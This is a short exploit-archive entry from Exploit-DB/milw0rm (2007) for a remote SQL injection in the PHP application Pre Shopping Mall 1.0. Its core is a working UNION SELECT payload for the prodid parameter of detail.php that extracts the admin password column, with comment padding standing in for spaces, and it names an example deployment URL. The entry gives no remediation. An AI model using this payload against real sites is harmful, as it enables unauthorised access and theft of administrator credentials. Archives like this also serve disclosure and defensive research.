Pre Shopping Mall 1.0 - SQL Injection

EDB-ID:

3842


Platform:

PHP

Published:

2007-05-03

==============================================

Pre Shopping Mall v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
detail.php?prodid=-1/**/union/**/select/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

==============================================

Example: http://preproject.com/emall/

==============================================

# milw0rm.com [2007-05-03]